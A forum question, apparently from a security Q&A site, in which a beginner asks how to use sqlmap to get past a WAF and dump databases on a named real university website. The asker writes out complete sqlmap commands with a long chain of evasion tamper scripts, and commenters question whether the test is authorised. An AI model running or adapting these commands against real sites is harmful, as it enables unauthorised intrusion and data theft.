
I'm starting with sqlmap and I have the following problem. When I try to use sqlmap (trying to bypass the WAF) using this snippet:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

or this one:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

I saw that the following appears in the console:

[WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable 
[WARNING] heuristic (basic) test shows that GET parameter 'view' might not be injectable

I also tried to find a URL inside my site similar to http://www.cafe53rd.com/menu.php?item_id=3, because I checked that this kind of URL is the easiest to access, but I can't find one for the site I'm auditing.

What would be the right code to do this on the following site ("http://prefing...")?

SilverlightFox
Alan Alvarez
  • 1
    I can't understand what you are asking. You need help finding URLs of a certain format? – mcgyver5 Jul 17 '15 at 21:10
  • 2
    If you are just starting with SQL Map, don't start with trying to bypass a WAF, start simple. Disable the WAF for your audit. – mcgyver5 Jul 17 '15 at 21:13
  • 1
    First up, are you authorised to test the security of this system? If not, you shouldn't be running SQLmap against it. If you are, then I would recommend testing without the WAF in place. – Rory McCune Jul 18 '15 at 15:09
  • OK, I'll tell the teacher to disable the WAF. Yes, my problem is finding vulnerable URLs. I recently found one that contains the terms /pre/login/login2.do?id_rol=pst0. I found it using Vega software, but now on the sqlmap console I get: "id_rol = pst0" is not injectable. What can I do? PS: This is part of a teams test, that's why I can't have so much help from my teacher. Thanks – Alan Alvarez Jul 20 '15 at 10:28
